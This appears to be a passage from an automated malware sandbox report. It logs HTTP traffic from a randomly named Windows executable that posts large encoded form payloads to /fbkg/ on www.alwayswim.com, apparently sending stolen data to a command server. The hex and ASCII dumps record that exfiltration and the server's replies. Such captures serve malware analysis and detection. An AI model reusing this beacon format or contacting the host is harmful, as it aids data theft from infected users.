                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 6f 33 6a 39 38 4a 63 43 6f 2f 42 69 58 61 65 53 39 48 7a 47 6d 64 42 51 56 65 74 5a 4d 38 72 72 79 42 6b 63 52 2b 37 44 6d 76 76 37 79 61 31 7a 36 61 7a 4e 68 45 38 79 30 61 46 4f 58 77 58 65 76 7a 63 5a 44 32 36 2f 4f 51 57 59 47 39 43 50 45 36 71 56 71 39 67 4a 51 43 2f 79 62 52 30 2f 58 72 56 77 49 67 47 45 55 49 5a 62 67 6c 76 4a 6f 69 39 77 39 45 4b 64 63 52 52 61 41 31 73 35 65 49 6e 73 49 31 52 4b 53 63 48 30 62 31 45 53 52 2b 45 50 53 50 54 2b 36 59 54 71 38 55 4e 43 53 68 69 61 59 56 72 63 38 79 38 75 77 39 44 72 6d 50 56 32 74 69 6d 63 6a 70 41 79 31 31 49 41 37 36 75 46 35 6c 6e 56 61 30 7a 6f 6f 39 66 6e 49 37 46 50 58 48 52 4a 43 4d 64 4d 57 48 58 48 57 31 74 55 66 2b 54 68 49 4a 6d 4b 78 77 6e 39 69 6e 36 48 58 65 4c 30 33 71 69 42 34 2b 58 67 36 30 5a 53 73 4f 36 5a 2f 48 4a 50 30 75 59 53 34 76 59 4d 41 32 39 58 41 32 31 34 4d 46 6a 67 79 4a 71 4e 31 32 76 2f 62 31 32 5a 62 4f 35 31 6c 53 2b 76 53 63 51 62 57 66 6d 44 34 41 2f 4d 67 55 4b 4b 45 64 56 70 61 36 57 2b 69 69 41 6a 47 7a 4a 6e 4c 63 53 30 47 72 64 41 39 4f 77 77 4b 74 68 58 7a 77 51 75 5a 64 73 45 63 38 30 5a 2f 4b 46 63 51 4c 79 2f 46 47 2b 4f 6f 4c 4e 78 6d 79 54 6a 5a 30 7a 50 32 6d 61 52 51 4e 67 2b 73 63 6c 38 47 63 39 4e 74 34 39 5a 6b 36 54 52 58 50 4d 68 64 69 64 79 35 33 74 50 66 59 72 77 6e 48 52 73 67 45 38 33 6f 49 46 30 77 6c 50 61 57 68 39 53 4b 42 69 58 4b 4e 32 55 53 48 6b 39 44 4c 54 67 51 4c 5a 39 48 65 37 51 75 31 4e 49 61 30 53 4c 6c 61 52 58 70 66 42 55 79 69 49 46 75 49 4a 71 56 34 30 79 76 67 77 3d
                                                                                                                                                                                                Data Ascii: T6I=ANorJ0fhsFqdo3j98JcCo/BiXaeS9HzGmdBQVetZM8rryBkcR+7Dmvv7ya1z6azNhE8y0aFOXwXevzcZD26/OQWYG9CPE6qVq9gJQC/ybR0/XrVwIgGEUIZbglvJoi9w9EKdcRRaA1s5eInsI1RKScH0b1ESR+EPSPT+6YTq8UNCShiaYVrc8y8uw9DrmPV2timcjpAy11IA76uF5lnVa0zoo9fnI7FPXHRJCMdMWHXHW1tUf+ThIJmKxwn9in6HXeL03qiB4+Xg60ZSsO6Z/HJP0uYS4vYMA29XA214MFjgyJqN12v/b12ZbO51lS+vScQbWfmD4A/MgUKKEdVpa6W+iiAjGzJnLcS0GrdA9OwwKthXzwQuZdsEc80Z/KFcQLy/FG+OoLNxmyTjZ0zP2maRQNg+scl8Gc9Nt49Zk6TRXPMhdidy53tPfYrwnHRsgE83oIF0wlPaWh9SKBiXKN2USHk9DLTgQLZ9He7Qu1NIa0SLlaRXpfBUyiIFuIJqV40yvgw=
                                                                                                                                                                                                Nov 17, 2023 19:30:29.814033985 CET987INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:29 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 45 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 d3 30 10 be f7 57 08 1f 3a 30 83 2d c7 69 da 84 5a 61 4a 69 06 9b 0c 61 a0 40 9a 4b 47 91 14 7b 53 59 32 b6 6c d7 c3 f0 df f1 83 69 0c e1 80 0e 5a ed 6a 5f df b7 92 ff ec ed ea fa f6 ee e3 0d 8a 4d 22 e7 27 7e 2b 90 a4 2a 22 96 50 d6 fc 04 35 cb 8f 05 e5 fd b1 53 13 61 28 62 31 cd 72 61 88 f5 e5 76 61 4f 7f 7b 1e ae 63 63 52 5b 7c 2f a0 24 d6 a3 5d 50 9b e9 24 a5 06 b6 52 58 88 69 65 84 6a 62 83 1b 22 78 24 8e a2 15 4d 04 b1 4a 10 55 aa 33 33 08 a8 80 9b 98 70 51 02 13 76 a7 bc 44 a0 c0 00 95 76 ce a8 14 64 e4 b8 c3 74 06 8c 14 73 1f f7 b2 83 d3 35 a9 74 ce 32 48 cd 01 d6 bf 7b cf c4 2e 13 79 3c 68 c1 bd 2c 32 49 5a 7c af 30 ae aa ea c2 75 a8 ac 68 9d 57 90 38 0d 4a 6c 21 7c c8 ea e3 e3 4a 7e 47 e0 90 a1 e3 2a 93 ff ae e2 e3 c3 78 fc ad e6 35 d2 4a 6a ca 89 c5 f5 7d 7f 7c fe 62 48 49 0f 1c 99 3a 6d 38 36 e2 d1 e0 3d 2d 69 6f 1d f8 b5 7c ec 0a c5 0c 68 85 06 a9 d0 8f 27 16 5b 97 76 55 a0 b8 ae 1c a3 53 47 6a d6 4c 59 2b 27 6e 30 21 82 ac 03 51 7f d1 b4 db 3e 44 af a3 94 8c 4e f7 79 b3 15 05 70 32 ba 70 5d ef 6c 32 f5 66 8e eb ba e7 67 13 6f 3c 9b 9d 6a 13 8b ec 9e 66 51 4e 44 1d 8e 58 f2 00 2b b8 82 a5 b7 01 ea 31 58 5e 5f c1 dd 3a 54 ac 0e ce 83 eb a0 d3 59 f2 35 d9 ac 43 c9 a0 b5 85 9a bf fb 54 ad 60 5a f2 31 1f 2f 93 45 ce bd c5 84 8d 79 ba fd 3c d9 6f 3d b7 dc 24 61 b6 a9 a7 7d ae 6f 1f f6 9b f5 1b 37 d8 eb 28 00 5d be 87 70 66 5d fe 01 fa e7 93 e6 e3 e1 3b f2 71 3b 80 e6 1b e1 ee 3b fd 02 73 64 80 8d 5e 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1EESKs0W:0-iZaJia@KG{SY2liZj_M"'~+*"P5Sa(b1ravaO{ccR[|/$]P$RXiejb"x$MJU33pQvDvdts5t2H{.y<h,2IZ|0uhW8Jl!|J~G*x5Jj}|bHI:m86=-io|h'[vUSGjLY+'n0!Q>DNyp2p]l2fgo<jfQNDX+1X^_:TY5CT`Z1/Ey<o=$a}o7(]pf];q;;sd^0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                45192.168.11.205017245.33.23.18380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341881037 CET996OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 6f 33 6a 39 38 4a 63 43 6f 2f 42 69 58 61 65 53 39 48 7a 47 6d 64 42 51 56 65 74 5a 4d 39 54 72 79 7a 73 63 44 4a 50 44 68 76 76 37 75 4b 31 79 36 61 79 4e 68 45 56 37 30 61 4a 65 58 31 4c 65 76 67 6b 5a 43 45 69 2f 43 77 57 62 62 4e 43 4e 41 36 71 42 71 39 73 64 51 43 71 48 62 68 77 2f 57 6f 4e 77 4d 54 2b 46 57 59 59 51 67 6c 76 2f 2b 69 39 4f 39 46 62 44 63 52 64 61 41 33 59 35 65 2b 37 73 4b 6d 35 4b 62 73 48 72 43 6c 45 64 59 65 46 33 53 50 48 41 36 59 54 51 38 51 56 43 53 6a 36 61 5a 57 43 4b 38 53 38 75 2b 64 44 6f 69 50 70 79 74 69 36 50 6a 71 63 79 31 33 49 41 36 61 75 46 79 6b 6e 53 4e 6b 7a 71 69 64 66 77 5a 75 64 48 58 47 31 33 43 4d 35 4d 57 32 7a 48 58 45 74 55 65 66 54 68 4c 70 6d 49 73 41 6d 68 35 33 36 54 58 65 62 47 33 71 44 30 34 35 50 67 36 56 35 53 2b 2f 36 61 6f 58 4a 57 78 75 59 44 38 76 45 41 41 32 4e 4c 41 32 31 6f 4d 48 50 67 79 36 69 4e 30 33 76 2b 57 46 32 6b 43 2b 35 61 75 79 79 66 53 63 4d 54 57 65 75 74 34 43 54 4d 67 30 4b 4b 55 4b 42 71 51 4b 57 35 36 69 41 78 4d 54 4a 4a 4c 63 66 56 47 75 77 33 38 2f 49 77 4c 64 52 58 69 77 51 74 53 74 74 4e 57 63 31 53 70 36 46 63 51 4c 75 42 46 47 79 4f 70 36 31 78 33 56 33 6a 53 48 4c 50 6d 57 61 54 51 4e 68 77 73 5a 38 4d 47 63 31 33 74 34 4e 6e 6b 38 72 52 55 63 45 68 51 44 64 78 39 48 74 4b 62 59 71 71 36 33 63 73 67 45 51 73 6f 49 56 65 77 57 37 61 51 52 74 53 5a 52 69 59 41 4e 32 58 56 48 6b 56 53 37 76 6b 51 4b 31 4c 48 66 65 62 75 33 39 49 4b 43 43 52 32 62 30 4d 30 75 35 35 35 79 45 42 6f 4c 74 61 47 74 6b 4a 75 6d 55 42 75 70 39 6d 30 6e 43 7a 75 37 51 32 55 6b 6b 66 58 7a 4b 67 79 39 70 78 6c 6f 39 4b 33 71 33 49 69 42 57 41 71 30 51 4b 31 46 4b 51 65 74 59 63 65 74 42 65 36 46 57 39 49 33 72 32 2b 53 76 4b 50 51 32 6b 50 54 74 2f 59 67 53 48 48 71 62 39 63 44 47 72 63 51 6f 4c 68 76 4a 63 78 4e 68 48 61 77 55 42 4b 52 67 66 72 72 79 42 48 54 48 4b 62 67 4e 49 4a 34 63 4b 5a 31 4d 58 39 34 37 67 57 2b 72 31 61 5a 36 6b 65 61 41 55 67 62 65 4b 74 52 6f 68 59 6a 4e 32 67 6c 54 31 52 2f 41 74 45 36 65 31 63 66 4b 78 39 74 6e 53 54 5a 59 4a 4e 6b 79 65 78 75 6c 53 64 70 52 4b 56 55 37 38 69 73 61 6d 6b 33 66 7a 53 45 54 6d 55 38 4d 63 33 35 64 63 77 32 74 39 32 4a 31 73 69 4f 33 76 32 59 6d 61 4d 35 6c 55 55 70 68 36 35 4d 2f 65 71 45 6a 50 2f 55 68 4a 66 31 4b 68 55 46 4c 76 78 43 4e 55 4b 39 44 66 65 6e 50 39 57 41 49 70 48 2f 39 43 79 42 75 47 46 39 6f 77 6c 49 7a 41 70 35 43 6f 4c 4a 76 45 6e 68 6e 61 54 73 7a 2f 76 4d 73 66 75 34 36 46 2f 37 48 6d 35 6d 34 41 78 6d 36 38 41 54 2f 77 74 6f 4f 68 68 4c 6b 53 38 7a 56 6c 63 31 6b 47 4c 46 54 30 59 31 6a 62 77 37 32 34 50 49 48 70 43 2b 5a 37 4f 47 76 54 6f 4b 4e 59 69 30 48 69 2b 79 46 63 79 45 51 77 34 33 64 34 37 64 63 31 64 73 34 51 2f 53 6a 4a 58 6c 78 68 5a 33 74 6f 66 45 66 4f 4f 53 32 50 73 31 78 4a 36 72 53 79 56 36 36 2f 57 58 39 66 41 67 61 44 2f 59 7a 55 7a 47 59 32 32 68 6a 33 57 2f 72 4a 44 6b 6d 56 73 62 67 78 36 56 43 31 39 76 6f 53 4c 55 62 37 30 62 73 2f 51 70 47 70 49 7a 77 65 36 33 6a 42 4c 61 79 61 53 70 4c 56 5a 5a 61 36 6c 74 4e 35 4b 38 4c 69 50 33 38 74 63 4b 59 76 75 42 4d 4d 6e 5a 2b 7a 41 65 4e 35 6a 4d 42 70 52 33 75 66 68 36 4a 39 4e 79 51 5a 4d 61 78 42 79 74 31 59 72 69 52 76 39 42 72 55 6b 66 74 71 77 6a 54 6d 34 4a 72 55 4a 48 4f 54 50 43 6e 36 68 66 77 34 4c 6c 57 71 42 71 70 5a 6d 6c 57 75 47 71 4e 51 42 33 58 46 51 7a 57 49 45 6e 56 37 61 45 76 67 77 78 72 45 62 58 43 54 4e 77 52 31 59 48 4e 5a 33 52 52 72 56 58 35 4b 63 4f 6c 55 75 7a 4f 6d 41 73 62 4c 72 6e 76 73 6e 39 31 6c 31 58 42 42 37 78 72 51 4c 64 6d 32 33 46 67 6f 34 46 43 41 4a 78 47 78 55 73 42 76 4c 2f 68 6f 6a 4f 4c 6b 49 68 35 35 37 49 45 66 59 65 55 4b 4a 46 59 66 72 6d 65 55 42 55 4f 36 63 34 32 68 2b 70 61 47 6c 6f 5a 52 53 6b 30 51 6e 68 35 32 63 42 65 63 77 4d 78 30 48 33 6a 57 5a 2b 4a 33 77 61 2f 66 67 53 72 4d 31 50 47 77 4e 44 47 7a 4b 48 6d 34 77 73 74 7a 74 2b 47 59 76 4a 76 6e 75 34 61 42 34 31 65 31 54 6a 4a 65 39 58 4a 4a 68 48 67 4a 41 77 36 37 6e 69 75 50 63 62 36 48 32 4f 4a 57 5a 50 32 73 39 69 39 46 73 55 38 36 4c 44 4e
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341968060 CET1000OUTData Raw: 31 74 32 46 36 48 79 65 31 75 50 6d 35 54 6e 64 44 32 76 2f 2b 2b 4c 73 49 41 4a 7a 48 76 50 63 50 33 2b 35 4c 45 43 4f 50 30 58 4f 74 79 69 6a 4a 71 43 46 6e 61 6a 33 53 6e 53 32 6d 4c 4f 59 41 6f 64 71 46 59 6b 62 6c 67 41 36 5a 36 78 73 70 6b
                                                                                                                                                                                                Data Ascii: 1t2F6Hye1uPm5TndD2v/++LsIAJzHvPcP3+5LECOP0XOtyijJqCFnaj3SnS2mLOYAodqFYkblgA6Z6xspkspXT6vmK4puXF0qRnAS75dN9XNgPQ+H+v5BmBJKRUT3chV3g5SfUivUxguoq9eU5LreRPa4HLM9qewkFbY6+kP0lxTQhf5ROpW25FCIgEQnBZhQQBJxZP+x63CcBhQtiaryZZviuR0QP3m5GvHr11oikLXJbWvPyH
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482650995 CET1003OUTData Raw: 52 73 37 75 46 38 7a 6d 6c 41 78 41 65 68 72 53 33 62 69 35 49 58 34 4f 44 54 43 4b 4c 62 65 56 65 42 57 55 4c 38 7a 41 43 64 58 7a 76 38 41 42 2b 4c 31 42 51 55 33 61 47 75 6e 59 6b 4a 43 35 46 47 42 57 76 41 4a 34 31 78 6d 58 44 36 58 56 52 6b
                                                                                                                                                                                                Data Ascii: Rs7uF8zmlAxAehrS3bi5IX4ODTCKLbeVeBWUL8zACdXzv8AB+L1BQU3aGunYkJC5FGBWvAJ41xmXD6XVRkhoh3EqlcAHlmBUbrLvYFGHUzRVPNmMfqBjKD4fyht4IvVHBS+bhTqLE+unu1CY14ek2x92kTpLkGJjVBAIyC/BWkE36omgYF5qj86slvO43ytFNTqF2YOgS3mXoi3LqCWEE1VtTBcmH7g3jpX8X7OagZcDC1QmpJm
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482783079 CET1010OUTData Raw: 6e 50 4b 76 69 74 48 66 30 51 30 4c 4c 36 72 6b 77 4b 4f 61 33 42 68 68 70 63 34 36 75 78 61 49 4f 70 51 42 2f 47 72 78 4e 38 41 6c 44 45 2f 77 7a 48 33 41 38 45 51 49 45 76 77 39 62 4a 6f 52 65 76 55 72 48 43 46 6e 2f 61 32 4d 63 6e 64 31 47 72
                                                                                                                                                                                                Data Ascii: nPKvitHf0Q0LL6rkwKOa3Bhhpc46uxaIOpQB/GrxN8AlDE/wzH3A8EQIEvw9bJoRevUrHCFn/a2Mcnd1GrISBhJECv/NP2nLNrZ/cBqbM2irZ2mOWOG9fF0IpF0GOIZkokCvKHeeZHNZr9gzRs4hUbpWQ+z8dqf/+gqVp/jfJbJyDcFUF1cjhwARYIZjSxazGcgdT1osUmyDLNhhFXkRnH82w5HnvW1IMm0Fh9ZWkJu4k3HP7tg
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482944965 CET1013OUTData Raw: 6b 6e 4a 79 56 39 64 46 31 57 41 69 6b 72 75 77 47 57 30 5a 52 34 38 36 6f 55 6f 77 77 78 4e 4c 30 6a 49 54 4e 6f 64 52 49 44 30 33 34 32 4b 62 66 56 2b 4a 41 47 68 4f 50 6d 69 45 62 78 35 30 71 71 31 35 4f 38 2f 6f 2f 47 50 63 55 55 74 66 69 42
                                                                                                                                                                                                Data Ascii: knJyV9dF1WAikruwGW0ZR486oUowwxNL0jITNodRID0342KbfV+JAGhOPmiEbx50qq15O8/o/GPcUUtfiBw1HaEkqijD5PUl2faCSTykH6jU+Wr7ahEMTxXzb4s6BzUoQQD/HhfM5nPdyK61JIGiQfnntJkQ5EY/9TVdY6UpPYuUMsEsnROK6FOnkQDDVfJrT7UP99JDbxpEAiPeKb2PbJWRBfK89hNjqhbuaVwLoSVKNgt1wKj
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483093977 CET1014INHTTP/1.1 413 Request Entity Too Large
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:32 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 607
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483124018 CET1016OUTData Raw: 7a 6a 73 4b 39 6b 4d 46 79 78 43 70 4a 4a 59 68 43 4a 70 55 7a 33 48 4b 6d 73 66 48 67 50 52 4e 54 47 62 2f 32 59 36 54 6a 57 6e 78 41 79 77 55 2f 49 53 61 57 69 6d 4d 54 64 53 62 7a 38 64 2f 62 79 38 34 53 36 4b 31 74 55 70 30 6a 38 34 53 50 78
